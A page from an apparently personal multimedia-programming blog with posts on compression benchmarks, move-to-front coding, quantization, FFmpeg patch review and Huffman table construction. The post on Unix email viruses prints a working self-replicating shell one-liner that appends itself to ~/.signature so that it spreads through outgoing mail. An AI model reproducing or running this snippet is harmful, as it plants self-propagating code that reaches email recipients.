Lair Of The Multimedia Guru

2007-07-06

Forgotten code, VGA600

Low resolution graphics modes like 320×200 are displayed with doublescan so that each logical line is drawn twice, that way 320×200 is drawn with 400 lines which looks better than 200 on a modern CRT monitor. The reason is that modern CRT monitors are designed to be able to display 1000 or more lines and if they are feeded with just 200 there would be huge black bars between these thin 200 lines, with 400 lines its better but still not good.

VGA600 is a little DOS TSR which i wrote in 1996/1997 to solve this problem, VGA600 does that by monitoring the state of various vga registers and if it detects that the current graphic or text mode can be improved then it improves it by increasing the number of lines and dot clock. So for example 320×200 would be displayed with 600 or 800 lines (which it is depends on the configuration)

Source code under GPL, README and binary are available too

Ive extensively tested VGA600 with doom and quake with a ET4000 PCI card a long time ago ;)

Patches welcome, especially ones porting this to linux and modern vga cards :)

Filed under: Off Topic — Michael @ 01:53

Comments (0)

2007-06-20

Unix email viruses, do they exist?

Seeing all the thousends of email viruses in my spam folder, all probably specific to windows, iam wondering why havnt i seen any for linux. Are linux users too intelligent to copy and past unknown code into their terminal or execute a attached executable?

Its not hard to write a email virus for linux, if you dont belive me see the example below. Note, the code is public domain i dont claim any copyright on it. Standard disclaimer: iam not resposible for the consequences of using this code for anything even less so modificated variants of it. Iam just providing this for scientific purposes! Do not use it for any evil!

echo ' echo echo `echo -e \\\47;cat /tmp/t;echo -e \\\47`\>/tmp/t\;. /tmp/t>>~/.signature'>/tmp/t;. /tmp/t

Filed under: Off Topic — Michael @ 01:31

Comments (3)

2007-06-18

mnzip

I always wanted to write my own general purpose compressor, a short while ago i actually did. Its based on the BWT + MTF variant described in yesterdays blog post + snows/ffv1s range coder with a state transition table borrowed from bbb/paq8 source code under GPL is of course available too.

compressed file sizes of the Canterbury Corpus

	alice29.txt	asyoulik.txt	cp.html	fields.c	grammar.lsp	kennedy.xls	lcet10.txt	plrabn12.txt	ptt5	sum	xargs.1
bzip2 1.0.3	43202	39569	7624	3039	1283	130280	107706	145577	49759	12909	1762
7zip 4.43 beta	48555	44606	7692	3076	1350	50904	119569	165462	42153	9619	1860
bbb ver. 1	40839	37818	7736	3253	1349	76523	101117	135829	44816	12593	1792
mnzip r32 with plain MTF	42698	39286	7572	2962	1227	19804	105883	143634	50624	12591	1698
mnzip r32	40950	37835	7431	2983	1237	19287	101140	137191	45604	12428	1699

Time needed to compress

	alice29.txt	asyoulik.txt	lcet10.txt	plrabn12.txt	cp.html	fields.c	grammar.lsp	kennedy.xls	ptt5	sum	xargs.1
bzip2 1.0.3	0m0.166s	0m0.133s	0m0.533s	0m0.633s	0m0.047s	0m0.037s	0m0.007s	0m1.062s	0m0.151s	0m0.056s	0m0.006s
7zip 4.43 beta	0m0.539s	0m0.417s	0m1.732s	0m2.161s	0m0.070s	0m0.035s	0m0.019s	0m6.048s	0m1.402s	0m0.105s	0m0.022s
bbb ver. 1	0m2.675s	0m2.271s	0m7.455s	0m8.599s	0m0.559s	0m0.344s	0m0.230s	0m17.446s	0m45.407s	0m0.813s	0m0.235s
mnzip r32	0m0.273s	0m0.206s	0m0.951s	0m1.099s	0m0.031s	0m0.012s	0m0.006s	0m3.545s	0m1.173s	0m0.051s	0m0.006s

time needed to decompress

	alice29.txt	asyoulik.txt	lcet10.txt	plrabn12.txt	cp.html	fields.c	grammar.lsp	kennedy.xls	ptt5	sum	xargs.1
bzip2 1.0.3	0m0.063s	0m0.049s	0m0.177s	0m0.222s	0m0.007s	0m0.003s	0m0.002s	0m0.210s	0m0.053s	0m0.009s	0m0.003s
7zip 4.43 beta	0m0.033s	0m0.027s	0m0.066s	0m0.085s	0m0.009s	0m0.011s	0m0.007s	0m0.099s	0m0.043s	0m0.016s	0m0.006s
bbb ver. 1	0m2.265s	0m1.918s	0m6.015s	0m6.916s	0m0.511s	0m0.332s	0m0.231s	0m13.492s	0m6.660s	0m0.715s	0m0.237s
mnzip r32	0m0.073s	0m0.061s	0m0.215s	0m0.261s	0m0.010s	0m0.005s	0m0.003s	0m0.441s	0m0.155s	0m0.017s	0m0.002s

Options used where -9 for bzip2, -mx=9 for 7zip, f for bbb to use fast but memory hungry mode (this doesnt affect compression rate for bbb). The benchmark score are just single run based no proper mean so dont take them too serious, and i hope ive not messed up the file order ;)

Patches are welcome!

Filed under: Entropy Coding — Michael @ 01:20

Comments (11)

2007-06-16

Move to front coder/transform

First a little explanation about what a move to front coder is. Its a revesible transform which remaps symbols to an index into a table which initially contains (0,1,2,3,…) and every time a symbol is used its moved to the front of the table.

example: input: “to be or not to be” initial table: (abcdefghijklmnopqrstuvwxyz), for the first ‘t’ we output 19 as its the 19th entry in the table and move it to the front to build the new table (tabcdefghijklmnopqrsuvwxyz) the complete list of steps looks like:

abcdefghijklmnopqrstuvwxyz  19(t)
tabcdefghijklmnopqrsuvwxyz  15(o)
otabcdefghijklmnpqrsuvwxyz  27( )
 otabcdefghijklmnpqrsuvwxyz 4(b)
b otacdefghijklmnpqrsuvwxyz 7(e)
eb otacdfghijklmnpqrsuvwxyz 2( )
 ebotacdfghijklmnpqrsuvwxyz 3(o)
o ebtacdfghijklmnpqrsuvwxyz 19(r)
ro ebtacdfghijklmnpqsuvwxyz 2( )
 roebtacdfghijklmnpqsuvwxyz 17(n)
n roebtacdfghijklmpqsuvwxyz 3(o)
on rebtacdfghijklmpqsuvwxyz 6(t)
ton rebacdfghijklmpqsuvwxyz 3( )
 tonrebacdfghijklmpqsuvwxyz 1(t)
t onrebacdfghijklmpqsuvwxyz 2(o)
ot nrebacdfghijklmpqsuvwxyz 2( )
ot nrebacdfghijklmpqsuvwxyz 6(b)
bot nreacdfghijklmpqsuvwxyz 6(e)

As you can see the mtf transform will generally favor small numbers on “non random” data, on its own its not too usefull for compression but together with the BWT and a simple order 0 entropy coder its a pretty good general purpose compressor.

Now to the actual reason why i am writing this blog entry, can you use the symbol which the index represents as context for the entropy coder coding the index? You say no because thats like knowing the index together with the table.

Well if you think so, you are wrong, the trick is not to know the table :)

First to compress our data we run an mtf transform over it, we store the mtf table after the whole transform (this is not strictly needed but simplifies things). Next we encode the indexes from the end to the begin each time moving the zero entry of our table to the point pointed to by the index, each time we do know the symbol before the index and so can use it as context. This really is nothing else as the MTF coder in reverse.

An example, we start with the table (ebot nracdfghijklmpqsuvwxyz), the first symbol is ‘e’ the corresponding index is 6 (we know this from the forward MTF pass), so we store 6 with context ‘e’ and move e to the 6th place to find the table (bot nreacdfghijklmpqsuvwxyz), the next steps are all just the same than the MTF example above just in reverse.

Decompression is pretty much the same, read the table (again this isnt needed but its simpler as it avoids a 2nd pass over the data) then take the value from position 0 of the table and use it as context to decode the next index, after that use the index to move the entry from position 0 to its new position and repeat until you are out of input data.

Filed under: Entropy Coding — Michael @ 23:09

Comments (3)

2007-06-07

Quantization of a bunch of scalar variables

You have a few uniformly distributed independant scalar variables, how do you optimally quantize them? Simply each independantly by uniform scalar quantization, wrong this is likely to the surprise of the reader not optimal.

One way to see the suboptimality is to look at what independantly uniform scalar quantization does if we have 2 variables, it splits the plane in squares and represents all points within a square by its center. How can we do better? just split the plane in hexagons, both worst case and average quantization error decreases. The worst case for the square is 2^0.5/2=~0.7071, the worst case for the hexagon is 12^0.25/3=~0.6204

Another way to see the suboptimality is to look at the worst case point, which in case of the square lies equidistant to the centers of 4 squares but with a hexagon it just lies equidistant to 3 centers of 3 hexagons. So there are just 3 redundant ways to quantize it instead of 4

If we consider the (uniform scaler) quantization of the first variable of 2 then we can simply improve the worst case which lies exactly between 2 values of the first variable by making use of the useless least significant bit. More exactly add half a quantization step to the second variable if the first was quantized to an odd value, this interrestingly turns out to be equivalent to using hexagons for quantization, though the hexagons are a little squished here compared to the optimal case with regular hexagons

Ive also written a little test program in case anyone wants to play with this quantization stuff

Filed under: Uncategorized — Michael @ 02:28

Comments (4)

2007-05-22

storing xiph codecs in containers other than ogg

Storing vorbis, theora and all the other xiph codecs in containers other than ogg is in principle not difficult, the primary problem is just that xiph codecs have several global headers while most generic containers expect just 1 or no global header. Mapping from several (3 normally) to 1 can be done in many ways and as there is no official recommandition from xiph which says how to do this, people have come up with various incompatible solution. Furthermore people have done other insane things like storing vorbis in ogg and that in avi and similar very very broken things …

So a long time ago ive decided to write a proposal for a recommandition on how to store xiph codecs in containers other than ogg, sadly it has been mostly ignored at the time of its writing

But yesterday someone from xiph contacted me and alex and asked if we where interrested to work on this oggless recommandition :) which lead to The oggless wiki page and a posting on ogg-dev so if you want to contribute to this / disscuss it (on ogg-dev), now is the right time …

Filed under: Container Formats,FFmpeg — Michael @ 21:32

Comments (4)

2007-05-19

Reviewing Patches

Whats a patch

A patch can be many things if you look at wikipedia, but the one i mean here is of course whats generated by the diff program. What diff outputs are simply differences between 2 text files in a terse form which is human and machine readable. The machine readable part means that the diff output together with one of the 2 input text files can be used by the patch program to generate the other text file. This makes patches a very convenient method of communicating changes between people, as people can read and understand them and apply them automatically to a file.

The following is an example patch which corrects a serious mistake of shakespeare. Sadly shakespeare did know about the patch program so he apparently failed to correct that …

--- mytext	2007-05-19 00:46:37.000000000 +0200
+++ mytext2	2007-05-19 00:47:12.000000000 +0200
@@ -1,3 +1,3 @@
 Shakespear said or wrote or whatever ...
-"To be or not to be,
+"To pee or not to pee,
 that is the question"

What are patches used for

Well they are used for communicating changes between software developers, at least in the open source world. So for example if you change the ffmpeg source code and fix a bug or add a feature then you could make a patch and submit that to us.

Why a patch and not the whole text

Well just think about the following: 2 people send you a patch, you look at the 2 small patches and if you are ok with them, you just apply both and have both changes in your text (which may be the source code of a program, or it might be just a love letter, the patch program doesnt care). On the other hand if the 2 people would have sent you the complete files not only would it be tricky to see what they have changed, integrating the changes would be even less fun. Note there are of course cases where applying 2 patches from 2 people conflict with each other so that they cannot both be applied automatically but in practice this is rare if the patches are clean

Reviewing

Now after this little introduction lets look at the actual reviewing of patches. People send us patches with their modifications of the ffmpeg source code and we review and comment on them. … Well, its sadly more i than we but anyway

The primary goal of the reviewing is to prevent bad, broken, buggy, inefficient, stupid, unneeded, … changes from being applied to the official ffmpeg source, so as to keep the source code small, efficient, simple, fast and working. This might sound like an easy task but it is absolutely not easy, if it where people would not subimit crappy changes in the first place but rather realize the problems and correct them before submitting.

Fixing problems in patches ourselfs vs. forcing the submitter to fix them

Fixing all issues which are found during review is always the problem of the person who submitted the patch. The first reason for that is it works very well in practice as the submitter wants the change to be accepted. The second reason is simply that we dont have the time to fix the issues considering the number of patches we receive and applying patches without all issues fixed would cause the quality, stability and maintainability of ffmpeg to decline steeply so that isnt an option either.

Sanity check

This is the first simply review level which checks if the patch could be applied at all if we wanted to apply it and if it does work

Is it a patch at all?
Is it undamaged?
does it apply to the current latest ffmpeg source?
do the regression tests pass? (We have a series of automated tests which check if various things like encoding, decoding and seeking still work as they did before)
does the patch not introduce any trailing whitespace or tabs? (we have agreed that these dont do any good and so the ffmpeg source doesnt contain any, this is arguable a philosophical issues but its easy to conform to)
does it not mix whitespace/cosmetic changes with functional changes? (patches which do are very hard to review so we always require them to be split)
does it do what the author claims it does?

Low level review

Low level here means reviewing the code in a line per line / function per function way without thinking too much about how the lines or functions are used

Are there any obvious bugs in the code?
Is the code minimal, that is can the same thing be done with less code? Less code generally means fewer bugs, faster code and less to read and understand …
Is the code fast? (does speed even matter where its used)
Is the indention consistent?
Is the code portable or would it fail on a big endian architecture?
Does the change not break anything?
Are all function/struct/… comments doxygen compatible so that nice html source code documentation can be automatically build?
Is the code not duplicated? Duplicated code is hard to maintain and wastes space in the source, the object file and in memory at runtime
Does the code have proper prefixes on the names of non static functions to avoid namespace issues?
Does the code not break the API/ABI and if it does break it does it update the version numbers properly and is the change really needed?
Are all input values properly checked to prevent crashes and security issues with invalid input files?
Are the types of large arrays minimal so as to safe space?

High level review

Is the choosen algorithm wisely choosen or is there a faster/simple one? does speed or size matter more in the case where its used …
Can the patch be split into seperate or incremental changes? Splited patches are easier to review, they are easier to understand, they are easier to debug as they can be seperately reverted and applied
Does the implementation make sense or are there serious conceptual mistakes in it, like messing up codec/container seperation or doing not really needed things
Are Things properly split into files? (for example decoder and encoder should be in seperate files)
Can big and seperate features be disabled at compile time?
Do the advantages from applying the patch outweight the disadvantages? Some rare patches add features noone needs but to do that add alot of complexity though that is rare and often such things can be made optional at compiletime

There are probably more things i forgot, but iam getting tired and this blog entry has become much longer than i wanted it to become …

Filed under: FFmpeg — Michael @ 01:48

Comments (0)

2007-05-11

Tic Tac Toe

Java sucks, all remotely sane humans know that nowadays, but long long ago i did the unimagineable and volunteerly wrote some small java programs (until i realized how badly java sucks). Todays or actually tonights blog entry is dedicated to one of these, a little Tic-Tac-Toe game, which you should be able to see below in the unlikely case that you have java enabled in your browser

8? years old GPL source is available too, and in case you are wondering the images where created with povray, and yes patches to improve it are welcome ;)

PS: if you win send me a bugreport ;)

Filed under: Off Topic,Uncategorized — Michael @ 01:38

Comments (1)

2007-05-03

Small tasks #2 (Iterative motion estimation)

FFmpeg supports iterative motion estimation, but only for snow. It would be interresting to implement/port this code to the generic mpeg framework (motion_est.c/mpegvideo.c/h) in ffmpeg

This task requires:

Reading and understanding the generic motion estimation code
Reading and understanding the iterative motion estimation code in snow.c
Porting/Implementing iterative ME for the generic code

The advantage of iterative ME is higher quality per bitrate (but at higher computational cost).

Normal motion estimation tries to optimize each motion vector so as to minimize the weighted sum of the distortion (difference to the input picture) and the rate (bits for the motion vector). And after doing that for vector i, its done with i+1, then i+2 and so on, where all past vectors are held constant and all future ones are ignored. This is of course not correct, iterative motion estimation OTOH does not ignore any vectors but rather considers the bits of the future vectors too and performs several passes over all blocks until no further improvement is achived (=the search found a local minimum)

Filed under: FFmpeg — Michael @ 01:07

Comments (2)

2007-04-25

Small tasks for FFmpeg

The FFmpeg todo list is getting longer and longer and melanson suggested me to try to talk about some small tasks here so as to maybe inspire some reader to contribute to ffmpeg :)

Optimal huffman tables for (M)JPEG encoding

this is pretty trivial, instead of encoding the stuff with the default huffman tables, simply store the data in a temporary buffer, build optimal huffman tables for the data, encode data with them

Building optimal huffman tables

In the unlikely case that the reader doesnt know how to build a optimal huffman table and to safe google from the millions of people looking that up after the post ;) heres how:

you know the propability of each symbol (simply because you have “encoded” the image and know how often each symbol occured)
merge the 2 least likely symbols into one which has their propablities sum as its propability, after that you have 2 symbols less and 1 more or simply one symbol less to deal with
if you have more than 1 symbol left goto 2
your huffman table/tree is finished, you only have to decide which side of each branch gets 1 and which 0, assigning these in any random or non random way will do and have no effect on the decodeability or optimality of the result. Note, (m)jpeg puts some restrictions on the 1/0 assignment so you cannot do them entirely random

Update 2007-04-26

As a reader has noticed (m)jpeg has some additional constraints which cannot be ignored when building huffman tables. So heres some update to deal with these constraints

Additional constraints for (m)jpeg

No code may have all 1 bits

This is trivial to avoid, simply add an additional dummy symbol with propability lower then all other symbols, such a code would be the longest after building the huffman table and could then simply be given all 1 bits during assinging bits for each branch.

The maximum code length is 16

To avoid this we need to change the symbol propabilities before huffman tree building. The optimal solution is the package merge alorithm

The package merge algorithm

start with an empty list, lets call it list(0), set i=0
add 1 entry to list(i) for each symbol we have and give each a score equal to the propability of the respective symbol
merge the 2 symbols of least score and put them in list(i+1), list(i) will have 2 symbols less, list(i+1) will have 1 element more, the new score will be the sum of the 2 scores
if there is more than 1 symbol left in the current list(i) then goto 3
i++
if i < 16 then goto 2
select the n-1 elements in the last list with lowest score (n=the number of symbols)
the length of the huffman code for symbol s will be equal to the number of times the symbol occurs in the select elements

Example:
symbol  propability
A       1
B       2
C       5
D       10
E       21

optimal huffman tree
A       1111
B       1110
C       110
D       10
E       0

assume we would rather want max length 3

list(0)= A1 B2 C5 D10 E21
list(1)= A1 B2 AB3 C5 D10 CD15 E21
list(2)= A1 B2 AB3 C5 ABC8 D10 E21 CDD25
list(3)= AB3 ABC8 ABCD18 CDDE46

A       111
B       110
C       101
D       100
E       0

Note: ffmpeg already contains code to build huffman tables from just the their lengths

Filed under: FFmpeg — Michael @ 02:33

Comments (4)

« Previous Page — Next Page »

2007-07-06

2007-06-20

2007-06-18

compressed file sizes of the Canterbury Corpus

Time needed to compress

time needed to decompress

2007-06-16

2007-06-07

2007-05-22

2007-05-19

Whats a patch

What are patches used for

Why a patch and not the whole text

Reviewing

Fixing problems in patches ourselfs vs. forcing the submitter to fix them

Sanity check

Low level review

High level review

2007-05-11

2007-05-03

2007-04-25

Optimal huffman tables for (M)JPEG encoding

Building optimal huffman tables

Update 2007-04-26

Additional constraints for (m)jpeg

No code may have all 1 bits

The maximum code length is 16

The package merge algorithm

Links